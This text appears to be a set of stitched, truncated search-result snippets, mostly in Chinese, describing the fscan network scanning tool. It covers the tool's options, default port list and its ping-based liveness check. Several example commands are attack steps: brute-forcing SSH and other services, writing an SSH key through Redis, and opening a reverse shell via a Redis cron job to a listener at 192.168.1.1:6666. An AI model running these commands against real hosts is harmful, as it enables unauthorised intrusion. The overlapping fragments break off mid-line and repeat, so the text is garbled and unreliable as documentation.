(default"all")-no 扫描结果不保存到文件中-nobr 跳过sql、ftp、ssh等的密码爆破-nopoc 跳过web poc扫描-np 跳过存活探测-num int web poc发包速率(default20)-o string扫描结果保存到哪(default"result.txt")-p string设置扫描的端口:22|1-65535|22,80,3306(default"21,22,80,81,135,139,443,445,1433...
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)fscan.exe -h 192.168.1.1/24 -c whoami (...
首先,如果没有使用 -np 参数,则先使用 ping 进行一个存活探测:这里的小问题就是,存活检测的方式少了,对于禁ping的主机,就无法使用,这也导致有时候用fscan扫描会发现扫不到东西,或者是扫的东西太少了,而如果使用了 -np 可是全面扫描,但是又会浪费很多时间,特别是A段,B段这种。 之后就是:TCPportScan(), TC...
-m 指定扫描模式(默认为All) -t 线程数(默认60) -time 超时时间(默认3秒) -top 存活检测结果展示数量(默认10) -np 跳过存活检测 -ping 使用ping代替ICMP -skip 跳过指纹识别 Web扫描配置 -u 指定单个URL扫描 -uf 从文件导入URL列表 -cookie 设置Cookie -wt Web请求超时时间(默认5秒) ...
跳过web poc扫描-np 跳过存活探测-num int web poc发包速率(default20)-o string扫描结果保存到哪(default"result.txt")-p string 设置扫描的端口:22|1-65535|22,80,3306(default"21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")-pa string ...
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) ...
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成...
扫描结果不保存到文件中 -nobr 跳过sql、ftp、ssh等的密码爆破 -nopoc 跳过web poc扫描 -np 跳过存活探测 -numintweb poc 发包速率 (default20) -ostring扫描结果保存到哪 (default"result.txt") -pstring设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default"21,22,80,81,135,139,443,445,1433,330...
-np not to ping -o string Outputfile (default "result.txt") -p string Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91...